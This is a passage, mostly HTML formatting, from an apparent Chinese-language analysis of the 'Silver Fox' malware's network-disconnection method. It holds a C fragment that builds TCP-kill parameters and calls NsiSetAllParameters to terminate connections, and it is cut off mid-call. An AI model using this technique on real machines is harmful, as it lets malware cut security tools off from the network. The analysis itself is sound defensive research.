style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Prepare input data for socket termination</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">TcpKillParamsIPv4 params </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">localAddrFamily </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> AF_INET</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">localPort </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">WORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pTcpRow</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwLocalPort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">localAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pTcpRow</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwLocalAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">remoteAddrFamily </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> AF_INET</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">remotePort </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">WORD</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pTcpRow</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwRemotePort</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">params</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">remoteAddr </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pTcpRow</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">-&gt;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">dwRemoteAddr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Issue command to kill the TCP connection</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD result </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pNsiSetAllParameters</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">1,</span><span style="mso-spacerun:yes;"><span leaf="">                              </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Unknown / static</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">2,</span><span style="mso-spacerun:yes;"><span leaf="">                              </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// Action code</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">LPVOID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: 